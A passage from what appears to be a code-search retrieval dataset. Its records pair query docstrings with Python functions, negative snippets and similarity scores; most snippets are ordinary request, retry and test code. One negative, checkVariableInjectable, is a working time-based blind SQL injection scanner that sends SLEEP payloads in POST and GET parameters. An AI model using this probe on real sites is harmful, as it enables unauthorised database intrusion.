why but it refuses to connect more than\n # three times. Mac and Linux behave as expected.\n if sys.platform.startswith(\"win\"):\n assert nosleep.call_count == 3\n else:\n assert nosleep.call_count == 20", "def is_duplicate(self, **kwargs):\n return len(list(self.c.select(**kwargs))) > 0", "def testMultipleRequests(self):\n response = self.translator.parse_reply(self.factory.result)\n d = self._getClientConnection()\n for _ in range(1000):\n d.addCallback(lambda _: self.client.check_rate_limit())\n d.addCallback(self.assertEqual, response)\n return d", "def will_occur(self, now):\n return self.end_repeat is None or self.end_repeat >= now.date() or \\\n self.l_start_date >= now or self.l_end_date >= now", "async def _check_cooldown(self, request_id: int) -> bool:\n raise NotImplementedError()", "def repeat(self):\n return self._repeat", "def check_for_lock_request(self):\n while True:\n sleep(0.1)\n if self.get_state():\n sleep(5)\n self.lock()\n break", "def reqIDScan(self):\n for val in self._values:\n if val.reqIDScan(): return True\n return False", "async def _periodic_request(self) -> None:\r\n\r\n if not self._periodic_request_enabled:\r\n _LOGGER.warning(\r\n \"periodic request was not enabled at setup. This error should not appear.\"\r\n )\r\n return False\r\n\r\n await self.request_data()\r\n\r\n sleep = self._refresh_interval\r\n if self._fast_polling_count < self._fast_polling_count_max:\r\n self._fast_polling_count += 1\r\n sleep = self._refresh_interval_fast_polling\r\n\r\n _LOGGER.info(\"Periodic data request executed, now wait for %s seconds\", sleep)\r\n await asyncio.sleep(sleep)\r\n\r\n self._polling_task = self._loop.create_task(self._periodic_request())\r\n _LOGGER.debug(\"Periodic data request rescheduled\")", "def repeat(self, repeat: bool=None):\n self._select_interface(self._rc_repeat, self._http_repeat, repeat)", "def condition(self):\n return True", "def go_again(self):\n num = random.randint(1, 2)\n if num == 1:\n return True\n else:\n return False", "def _isNewTxn(self, identifier, reply, txnId) -> bool:\n return (identifier not in self.processedRequests or\n reply.reqId not in self.processedRequests[identifier]) and \\\n txnId is not None", "def can_retry(self, opname):\n\n if self.retry_deny and opname in self.retry_deny:\n return False\n\n if self.retry_allow and opname not in self.retry_allow:\n return False\n\n return True", "def can_be_modified(self):\n return self.state in {RequestState.pending, RequestState.accepted}", "def abort_already_made_request(rideID, user):\n reqs = get_ride_requests(rideID)\n\n for req in reqs:\n if req.user_id == user:\n msg = \"You have already made a request\"\n abort(HTTPStatus.CONFLICT, message=msg)", "def verify_repeat(self, new_repeat: 'Repeater') -> Optional['Repeater']:\n if new_repeat.StartingFrom in self.get_steps_names():\n return new_repeat\n else:\n return None", "def checkVariableInjectable():\n\n # innanzitutto calcolo il tempo medio su cinque richieste alla stessa pagina\n timeConnessione=[]\n for i in range(5):\n start=time.time()\n req=requests.post(\"%s\"%(OptionConfiguration.destination[0]))\n req.content\n end=time.time()\n timeConnessione.append(end-start)\n\n\n OptionConfiguration.tempoMedioConnessione=sum(timeConnessione)/5\n tempoMassimo=max(timeConnessione)\n # ottimizzo il tempo di connessione\n OptionConfiguration.timeToWait=int(tempoMassimo*5)+1;\n #OptionConfiguration.timeToWait=int(tempoMassimo*30)+1\n #print (OptionConfiguration.timeToWait);\n # il metodo di invio scelto e il POST\n\n if OptionConfiguration.methodSentData==\"POST\" :\n\n for key in OptionConfiguration.key:\n\n dataToSent=OptionConfiguration.data.copy()\n dataToSent[key]=dataToSent[key]+ \" AND SLEEP(%s)\"%(OptionConfiguration.timeToWait)\n #print dataToSent\n start=time.time()\n re=requests.post(\"%s\"%OptionConfiguration.destination[0],data=dataToSent)\n re.content\n re.close()\n end=time.time()\n\n if((end-start)>=OptionConfiguration.timeToWait):\n\n #print(\"The field '%s' appear injectable on Time-Based Blind SQLi (value int)\"%(key))\n start = time.time()\n re = requests.post(\"%s\" % OptionConfiguration.destination[0], data=dataToSent)\n re.content\n re.close()\n end = time.time()\n\n if((end-start)>=OptionConfiguration.timeToWait):\n\n OptionConfiguration.valueInjectable=key;\n OptionConfiguration.typeOfValue=\"int\"\n return True;\n\n else:\n\n #controllare se invece devo aggiunger un '\n dataToSent = OptionConfiguration.data.copy()\n dataToSent[key] = dataToSent[key] + \"' AND SLEEP(%s) -- -\"%(OptionConfiguration.timeToWait)\n # print dataToSent\n start = time.time()\n re = requests.post(\"%s\" % OptionConfiguration.destination[0], data=dataToSent)\n re.content\n re.close()\n end = time.time()\n\n if((end-start)>=OptionConfiguration.timeToWait):\n\n #print(\"The field '%s' appear injectable on Time Based Blind SQLi (value string)\" % (key))\n start = time.time()\n re = requests.post(\"%s\" % OptionConfiguration.destination[0], data=dataToSent)\n re.content\n re.close()\n end = time.time()\n\n if ((end - start) >= OptionConfiguration.timeToWait):\n\n OptionConfiguration.valueInjectable=key\n OptionConfiguration.typeOfValue=\"string\"\n return True;\n\n return False;\n\n #metodo di invio e il get\n elif OptionConfiguration.methodSentData == \"GET\":\n for key in OptionConfiguration.key:\n dataToSent = OptionConfiguration.data.copy()\n dataToSent[key] = dataToSent[key] + \" AND SLEEP(%s)\"%(OptionConfiguration.timeToWait)\n\n # essendo in get attacco i dati all'url\n data=creaStringaGet(dataToSent)\n #print (data)\n start = time.time()\n re = requests.get(\"%s?%s\" %(OptionConfiguration.destination[0],data))\n re.content\n re.close()\n end = time.time()\n if (end - start >= OptionConfiguration.timeToWait):\n #print(\"The field '%s' appear injectable on Time Based Blind SQLi (value int)\" % (key))\n OptionConfiguration.valueInjectable = key;\n OptionConfiguration.typeOfValue=\"int\"\n return True;\n\n else:\n #controllo se il campo e' una stringa\n #controllare se invece devo aggiunger un '\n dataToSent = OptionConfiguration.data.copy()\n dataToSent[key] = dataToSent[key] + \"' AND SLEEP(%s) -- -\"%(OptionConfiguration.timeToWait)\n data = creaStringaGet(dataToSent)\n # print dataToSent\n start = time.time()\n re = requests.get(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n re.content\n re.close()\n end = time.time()\n # se e una stringa il campo come posso fare?\n if(end-start>=OptionConfiguration.timeToWait):\n #print(\"The field '%s' appear injectable on Time Based Blind SQLi (value string)\" % (key))\n OptionConfiguration.valueInjectable = key;\n OptionConfiguration.typeOfValue = \"string\"\n return True;\n\n return False;\n else:\n\n print (OptionConfiguration.bcolors.BOLD+OptionConfiguration.bcolors.FAIL+\n \"Method to send data does not exist\"+OptionConfiguration.bcolors.ENDC)\n\n parseOptions.help()\n return False;", "def test_add_flow_request_only_one_validity_date_provided(self):\n for param in ('start_validity', 'expire_validity'):\n flow_request = self.flow_request.copy()\n del flow_request['start_validity']\n res = self._add_flow_request(flow_request=flow_request)", "def running(request):\r\n return request.session.get('partial_pipeline') is not None # Avoid False for {}.\r", "def needRestock(self):\n #TODO check if the quantity<threshold and return true if it is\n #we'll set for now the threshold at *five* items\n #so we need to check if self.quantity is less than five.\n threshold = 5\n if self.quantity < threshold:\n return True\n else:\n return False", "def need_update(self):\n five_minutes_ago = datetime.now() - timedelta(minutes=5)\n if (\n self.fetch_status != self.FetchStatus.NONE\n and self.collected_at > five_minutes_ago\n ):\n return False\n return True", "def hasura_request(record: dict) -> bool:\n # Get data/crash_id from Hasura Event request\n data = load_data(record=record)\n\n # Try getting the crash data\n crash_id = get_crash_id(data)\n city_id = get_city_id(data)\n old_jurisdiction_flag = get_jurisdiction_flag(data)\n\n new_jurisdiction_flag = is_crash_in_jurisdiction(crash_id)\n\n # If the city id is not already 22, then check...\n if city_id != 22 and is_crash_in_jurisdictions(crash_id):\n # Update the city_id to 22\n update_city_id(crash_id=crash_id, city_id=22)\n\n # If the old and new flags are the same, then ignore...\n if old_jurisdiction_flag == new_jurisdiction_flag:\n return False\n else:\n update_jurisdiction_flag(\n crash_id=crash_id,\n new_flag=new_jurisdiction_flag,\n )\n return True", "def execute_request(self, request: Request) -> bool:\r\n print(\"Handler is validating key\")\r\n if request.key is not None:\r\n if not self.next_handler:\r\n return True\r\n return self.next_handler.execute_request(request)\r\n else:\r\n print(\"Key is not valid\")\r\n return False", "def is_fivefold_repetition(self) -> bool:\n return self.is_repetition(3)", "def has_key(self, key):\n return key in self.responses", "def match_request(self, req):\n\n return req.method == 'POST' and req.path_info == '/bitbucketsync'", "def test_build__subsequent_calls_return_new_recurring_ride(self) -> None:\n ride_one: dict = RecurringRideFactory.build()\n ride_two: dict = RecurringRideFactory.build()\n\n assert ride_one != ride_two", "def test_singleConcurrentRequest(self):\n resolver = client.Resolver(servers=[('example.com', 53)])\n resolver.protocol = StubDNSDatagramProtocol()\n queries = resolver.protocol.queries\n\n query = dns.Query('foo.example.com', dns.A, dns.IN)\n # The first query should be passed to the underlying protocol.\n firstResult = resolver.query(query)\n self.assertEqual(len(queries), 1)\n\n # The same query again should not be passed to the underlying protocol.\n secondResult = resolver.query(query)\n self.assertEqual(len(queries), 1)\n\n # The response to the first query should be sent in response to both\n # queries.\n answer = object()\n response = dns.Message()\n response.answers.append(answer)\n queries.pop()[-1].callback(response)\n\n d = defer.gatherResults([firstResult, secondResult])\n def cbFinished((firstResponse, secondResponse)):\n self.assertEqual(firstResponse, ([answer], [], []))\n self.assertEqual(secondResponse, ([answer], [], []))\n d.addCallback(cbFinished)\n return d", "def test_duplicate_questions(self):\n self.is_authenticated()\n self.post_question()\n response = self.post_question()\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def check_allow_reset(self):\r\n if not self.ready_to_reset:\r\n if self.current_task_number > 0:\r\n last_response_data = self.get_last_response(self.current_task_number - 1)\r\n current_response_data = self.get_current_attributes(self.current_task_number)\r\n\r\n if (current_response_data['min_score_to_attempt'] > last_response_data['score']\r\n or current_response_data['max_score_to_attempt'] < last_response_data['score']):\r\n self.state = self.DONE\r\n self.ready_to_reset = True\r\n\r\n return self.ready_to_reset", "def add_request(self, request):\r\n\t\tself.requestCt = self.requestCt + 1\r\n\t\tfound = False\r\n\t\tfor req in self.requests:\r\n\t\t\tif \treq.service == request.service and \\\r\n\t\t\t\treq.host == req.host and \\\r\n\t\t\t\treq.port == req.port:\r\n\t\t\t\t\treq.timestamp = request.timestamp\r\n\t\t\t\t\tfound = True\r\n\t\t\t\t\tbreak\r\n\t\tif not found:\r\n\t\t\tself.requests.append(request)\r\n\t\t\tself.last_modified = time.time()", "def check_api(submitted_key, users_key):\r\n if users_key != submitted_key:\r\n return False\r\n else:\r\n return True", "def test_process_reply0(self):\n req1 = FakeRequest(1, True) # expired\n req2 = FakeRequest(2, False) # not expired\n req3 = FakeRequest(3, True)\n req4 = FakeRequest(4, False)\n req5 = FakeRequest(5, False)\n\n self.request_buffer.append(req1)\n self.request_buffer.append(req2)\n self.request_buffer.append(req3)\n self.request_buffer.append(req4)\n self.request_buffer.append(req5)\n\n reply = FakeReply(id=5)\n\n self.request_buffer.process_reply(reply)\n\n self.assertTrue(\n req1 in self.request_buffer.requests and\n req2 in self.request_buffer.requests and\n req3 in self.request_buffer.requests and\n req4 in self.request_buffer.requests and\n req5 not in self.request_buffer.requests\n )", "def _is_repeatedshot_type(cls, object_):\n return (type(object_).__name__ in ['RepeatedShot'])" ]
[ "0.7024639", "0.6854883", "0.6750136", "0.6601198", "0.6564489", "0.64355195", "0.61150056", "0.60088533", "0.5957636", "0.58485484", "0.57753676", "0.574291", "0.57246184", "0.5706755", "0.55322963", "0.549886", "0.5494331", "0.5449525", "0.5437684", "0.5399534", "0.5398021", "0.5397708", "0.5381306", "0.5360023", "0.5333514", "0.532608", "0.5287151", "0.5279226", "0.52788466", "0.52587765", "0.5245239", "0.5220736", "0.51945025", "0.51942986", "0.51770455", "0.5175401", "0.5169993", "0.51668024", "0.5142144", "0.51407677", "0.51385665", "0.51325536", "0.5121564", "0.5103263", "0.51010656", "0.5089064", "0.5083369", "0.50698566", "0.50628465", "0.50564396", "0.5054437", "0.50542235", "0.50392574", "0.503518", "0.5023856", "0.5022871", "0.50136036", "0.5013403", "0.50073236", "0.50030786", "0.49951327", "0.49884355", "0.4973491", "0.49608177", "0.49529472", "0.49505883", "0.49460205", "0.49367797", "0.49254745", "0.4924899", "0.49247277", "0.49232957", "0.4909869", "0.49091977", "0.49035236", "0.48997045", "0.48988077", "0.4896736", "0.48963562", "0.48905817", "0.4888436", "0.4883387", "0.48678833", "0.48635498", "0.48461658", "0.48373827", "0.48336446", "0.4831889", "0.48318195", "0.4829598", "0.4827421", "0.48257294", "0.48249853", "0.48223132", "0.48189956", "0.48151812", "0.48149553", "0.4808047", "0.4807303", "0.48052257" ]
0.5810275
10
Stuff to do before every test.
def setUp(self): # Get the Flask test client self.client = app.test_client() #Shows Flask errors that happen during tests app.config['TESTING'] = True #To test sessions we need to set Secret key app.config['SECRET_KEY'] = 'key' # Connect to test database connect_to_db(app, "postgresql:///testdb") # Create tables and add sample data db.create_all() users() reviews()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_run_tests(cls):\n pass", "def do_before(self):\r\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def setUp(self):\r\n # nothing to do, all tests use different things\r\n pass", "def setUp(self):\n print(\"New test by Nikolay Melnik\")", "def beforeTest(self, test):\n self.setupLoghandler()", "def before(self) -> None:\n pass", "def setUp(self):\r\n pass # nothing used by all\r", "def setUp(self):\n pass #because we dont have anything to setup.", "def setUp(self) -> None:\n pass", "def setUp(self) -> None:\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\r\n pass # nothing required by all\r", "def setUp(self):\n\n pass", "def setUp(self):\n\n pass", "def setUp(self) :\n pass", "def setUp(self):\n\n return", "def setUp(self):\r\n pass", "def setUp(self):\n print('Calling \\'setUp\\'')", "def setUp(self):\n self", "def setUp(self):\n self", "def setUp(self):\n \n pass", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def setUp(self):\n\n BaseTest.setUp(self)", "def startTestHook(self):", "def setUp(self):\n MainTests.setUp(self)", "def setUp(self):\n setUp()", "def setUp(self):\n super(BasicTestCase, self).setUp()", "def setUp(self):\n test_env_setup()", "def setUp_extra(self):\n pass", "def setUp(self):\n print(\"\\nIn setUp()...\")", "def setUp(self):\n\n # ISSUE007\n # TODO, pyunit's bright idea is to call setup before each test. It\n # was defining multiple patterns which was annoying but not a problem.\n # The cleanest way to do things is probably to remove patterns after\n # the test, but we don't have that functionality. For now just create\n # one pattern to avoid confusion, but do it by hacking in a global\n # variable\n\n global firstTime\n\n if not firstTime:\n return\n firstTime = False\n\n # get the full source name for even and odd sources\n out_of_order_numbers = quilt_test_core.get_source_name(\n \"out_of_order_numbers\")\n\n # TODO REad the pattern id from the std output then query that one\n # See ISSUE007 and ISSUE008\n # call quilt_define with the pattern code and name query\n # dups_follows\n quilt_test_core.call_quilt_script('quilt_define.py', ['-n',\n 'out_of_order',\n 'source(\"' + out_of_order_numbers + '\",\"grep\")'])", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_RMT_Util:\", self._testMethodName)", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def setUpTestCase(self):\n pass", "def setUp(self):\n raise NotImplementedError", "def setUp(self) -> None:\n return super().setUp()", "def setUp(self):\n\n self._set_up()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n self.setup_beets()", "def setUp(self):\n print 'unittest.setUp()'\n pass", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n if not self.flag:\n self.fail(self.err_msg)", "def setUp(self):\n # use self.attribute to keep anything which needs to be accessed later\n print('setUp method\\n')", "def before_each_test(self, request):\n self.test_counter = Counter()\n self.check_ref = request.config.getvalue(\"check_ref\")\n self.create_ref = request.config.getvalue(\"create_ref\")", "def setUp(self):\n super(TestCase, self).setUp()\n self._context = CallContext()", "def on_before_execution(self):\n pass", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n self.setUpPyfakefs()", "def startTestRun(self):", "def setUp(self):\n assert COMMANDS.keys() == EXPCT_RESULTS.keys()\n self.tests = []\n self.test_numbers = deque(sorted(COMMANDS.keys()))", "def __call__(self, result=None):\n self._pre_setup()\n super(TestCase, self).__call__(result)\n self._post_tearDown()", "def _fixture_setup(self):\n pass", "def test_begin(self):", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_ValidParams:\", self._testMethodName)", "def setUp(self):\n self.Reinitialize()", "def setUp(self):", "def setUp(self):", "def setUp(self):", "def setUp(self):" ]
[ "0.8211315", "0.802689", "0.80261695", "0.7873411", "0.76571673", "0.76434696", "0.76261467", "0.75419456", "0.75174975", "0.7496759", "0.7496759", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.7430124", "0.74281", "0.74281", "0.74227977", "0.7386099", "0.73804355", "0.737223", "0.73658484", "0.73658484", "0.7358147", "0.7357924", "0.73548126", "0.73508036", "0.73495203", "0.73456866", "0.7265522", "0.7265506", "0.7240312", "0.7171149", "0.71399295", "0.71390784", "0.71355546", "0.71355546", "0.7121487", "0.7119764", "0.71033466", "0.7096523", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.6991247", "0.69881433", "0.6983108", "0.6983108", "0.69539803", "0.6946693", "0.6936619", "0.68873084", "0.6879564", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6862542", "0.68564135", "0.6853987", "0.68533516", "0.6852911", "0.6827207", "0.68068117", "0.68066335", "0.67981744", "0.67981744", "0.67981744", "0.67981744" ]
0.0
-1
Stuff to do before every test.
def setUp(self): # Get the Flask test client self.client = app.test_client() # Show Flask errors that happen during tests app.config['TESTING'] = True #To test sessions we need to set Secret key app.config['SECRET_KEY'] = 'key' # Connect to test database connect_to_db(app, "postgresql:///testdb") # Create tables and add sample data db.create_all() users() reviews() with self.client as c: with c.session_transaction() as sess: sess['user_id'] = 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_run_tests(cls):\n pass", "def do_before(self):\r\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def setUp(self):\r\n # nothing to do, all tests use different things\r\n pass", "def setUp(self):\n print(\"New test by Nikolay Melnik\")", "def beforeTest(self, test):\n self.setupLoghandler()", "def before(self) -> None:\n pass", "def setUp(self):\r\n pass # nothing used by all\r", "def setUp(self):\n pass #because we dont have anything to setup.", "def setUp(self) -> None:\n pass", "def setUp(self) -> None:\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\r\n pass # nothing required by all\r", "def setUp(self):\n\n pass", "def setUp(self):\n\n pass", "def setUp(self) :\n pass", "def setUp(self):\n\n return", "def setUp(self):\r\n pass", "def setUp(self):\n print('Calling \\'setUp\\'')", "def setUp(self):\n self", "def setUp(self):\n self", "def setUp(self):\n \n pass", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def setUp(self):\n\n BaseTest.setUp(self)", "def startTestHook(self):", "def setUp(self):\n MainTests.setUp(self)", "def setUp(self):\n setUp()", "def setUp(self):\n super(BasicTestCase, self).setUp()", "def setUp(self):\n test_env_setup()", "def setUp_extra(self):\n pass", "def setUp(self):\n print(\"\\nIn setUp()...\")", "def setUp(self):\n\n # ISSUE007\n # TODO, pyunit's bright idea is to call setup before each test. It\n # was defining multiple patterns which was annoying but not a problem.\n # The cleanest way to do things is probably to remove patterns after\n # the test, but we don't have that functionality. For now just create\n # one pattern to avoid confusion, but do it by hacking in a global\n # variable\n\n global firstTime\n\n if not firstTime:\n return\n firstTime = False\n\n # get the full source name for even and odd sources\n out_of_order_numbers = quilt_test_core.get_source_name(\n \"out_of_order_numbers\")\n\n # TODO REad the pattern id from the std output then query that one\n # See ISSUE007 and ISSUE008\n # call quilt_define with the pattern code and name query\n # dups_follows\n quilt_test_core.call_quilt_script('quilt_define.py', ['-n',\n 'out_of_order',\n 'source(\"' + out_of_order_numbers + '\",\"grep\")'])", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_RMT_Util:\", self._testMethodName)", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def setUpTestCase(self):\n pass", "def setUp(self):\n raise NotImplementedError", "def setUp(self) -> None:\n return super().setUp()", "def setUp(self):\n\n self._set_up()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n self.setup_beets()", "def setUp(self):\n print 'unittest.setUp()'\n pass", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n if not self.flag:\n self.fail(self.err_msg)", "def setUp(self):\n # use self.attribute to keep anything which needs to be accessed later\n print('setUp method\\n')", "def before_each_test(self, request):\n self.test_counter = Counter()\n self.check_ref = request.config.getvalue(\"check_ref\")\n self.create_ref = request.config.getvalue(\"create_ref\")", "def setUp(self):\n super(TestCase, self).setUp()\n self._context = CallContext()", "def on_before_execution(self):\n pass", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n self.setUpPyfakefs()", "def startTestRun(self):", "def setUp(self):\n assert COMMANDS.keys() == EXPCT_RESULTS.keys()\n self.tests = []\n self.test_numbers = deque(sorted(COMMANDS.keys()))", "def __call__(self, result=None):\n self._pre_setup()\n super(TestCase, self).__call__(result)\n self._post_tearDown()", "def _fixture_setup(self):\n pass", "def test_begin(self):", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_ValidParams:\", self._testMethodName)", "def setUp(self):\n self.Reinitialize()", "def setUp(self):", "def setUp(self):", "def setUp(self):", "def setUp(self):" ]
[ "0.8211315", "0.802689", "0.80261695", "0.7873411", "0.76571673", "0.76434696", "0.76261467", "0.75419456", "0.75174975", "0.7496759", "0.7496759", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.74386895", "0.7430124", "0.74281", "0.74281", "0.74227977", "0.7386099", "0.73804355", "0.737223", "0.73658484", "0.73658484", "0.7358147", "0.7357924", "0.73548126", "0.73508036", "0.73495203", "0.73456866", "0.7265522", "0.7265506", "0.7240312", "0.7171149", "0.71399295", "0.71390784", "0.71355546", "0.71355546", "0.7121487", "0.7119764", "0.71033466", "0.7096523", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.70880145", "0.6991247", "0.69881433", "0.6983108", "0.6983108", "0.69539803", "0.6946693", "0.6936619", "0.68873084", "0.6879564", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6879344", "0.6862542", "0.68564135", "0.6853987", "0.68533516", "0.6852911", "0.6827207", "0.68068117", "0.68066335", "0.67981744", "0.67981744", "0.67981744", "0.67981744" ]
0.0
-1
Do at end of every test.
def tearDown(self): db.session.close() db.drop_all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_finished(self):\n\n # We'll start the next test in an idle, so that the current one is\n # properly terminated, and we do not execute in its context\n\n GLib.idle_add(self._do_test)", "def test_run_ended(self):", "def finished_tests(self):\n self.testing = 0", "def tearDown(self):\n\t\tprint(\"end test\")\n\t\tpass", "def after_test(self, test_results):\n pass", "def endOfTestcase(self):\n pass # nothing to do here. Hence pass statement is called.", "def on_test_end(self, logs=None):", "def after_all(self) -> None:", "def on_test_end(self):\n for callback in self.callbacks:\n callback.on_test_end(self, self.get_model())", "def after_test(self, func, *args, **kwargs):\n pass", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def tearDown(self):\n pass\n # teardown called after each test\n # e.g. maybe write test results to some text file", "def tearDown(self):\n super(TestCase, self).tearDown()\n self._context.check_done()", "def pytest_finished_handling_group(session, worker):", "def after(self):\n pass", "def after(self):\n pass", "def do_after(self):\r\n pass", "def teardown(self) -> None:", "def teardown(self) -> None:", "def teardown(self) -> None:", "def eof(self):\n self.report_scenario_completed()\n self.report_feature_completed()\n self.report_failures()\n self.stream.flush()\n self.reset()", "def teardown(self):", "def teardown(self):", "def teardown(self):", "def finish():\n pass", "def done(self):\n log.debug(\"Test run concluded\")\n if self._startTime is not None:\n self.report['startTime'] = self._startTime\n self.report['runTime'] = time.time() - self._startTime\n self.report['testsRun'] = self.testsRun\n self.report['tests'] = self._tests\n self.writeReport()", "def tearDown(self):\n self.logger.info(\"tearDown begin\")\n self.logger.info(\"tearDown end\\n\")", "def finish(self):\n pass", "def finish(self):\n pass", "def _end(self):\n\n self.logger.msg1(\"Done\")", "def Finish(self):\n pass", "def done(self):", "def done(self):", "def end(self):\n self._log.debug('%s: doing ..', __class__.__name__)\n self._log.debug('%s: done.', __class__.__name__)", "def finish():", "def finish():", "def finish():", "def finish():", "def teardown_method(self):\n world.clear_paths()\n print(\"\\nEnd of tests in: %s\\n-------------------\\n\" % __name__)\n self.bigml = {}", "def finished_tests(self):\n self.testing = 0\n if not self.closing:\n self.enable_menus(1)\n self.parent.finished_tests()", "def teardown(self):\n pass", "def teardown(self):\n pass", "def teardown(self):\n pass", "def end(self):\n ...", "def tearDown(self):\n print('Calling \\'tearDown\\'')", "def end(self):\n self._log.debug('doing ..')\n super().end()\n\n self._log.debug('done')", "def teardown(self):\n pass # pylint: disable=unnecessary-pass", "def finish(self) -> None:", "def finish(self) -> None:", "def after(self) -> None:\n pass", "def afterWork(self):\n pass", "def teardown(self) -> None:\n pass", "def teardown(self) -> None:\n pass", "def finished(self):\n\t\telog(\"finished\")", "def finish(self):", "def finish(self):", "def teardown(self, rc):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(c: Composition) -> None:\n c.run(\"testdrive\", \"verify-data.td\")", "def _do_test(self):\n\n process_all_events()\n\n if self.list:\n (callback, args, kwargs) = self.list.pop(0)\n callback(*args, **kwargs)\n else:\n safe_exit(force=1)", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def teardown(self):\n self.tcex.log.trace('teardown')", "def tearDown(self):\n\t\tpass", "def tearDown(self):\r\n self.app.application_close(self.util.client, self.app_name)\r\n\r\n self.common.generate_report(self.util.client, False)\r\n # Releases the client so that other clients can approach the agent in the near future.\r\n self.common.release_client(self.util.client)\r\n self.logger.info(\"==============Results=================\")\r\n self.logger.info(\"Number of Strings verified: \" + str(len(Config.results_list)/2))\r\n for i in range(0, len(Config.results_list), 2):\r\n self.logger.info(str(Config.results_list[i]) + \"{:>36}\".format('=====> ')\r\n + str(Config.results_list[i+1]))\r\n self.logger.info(\"Testcase tear-down: COMPLETED\")", "def _teardown(self):\n # No-op base implementation", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def 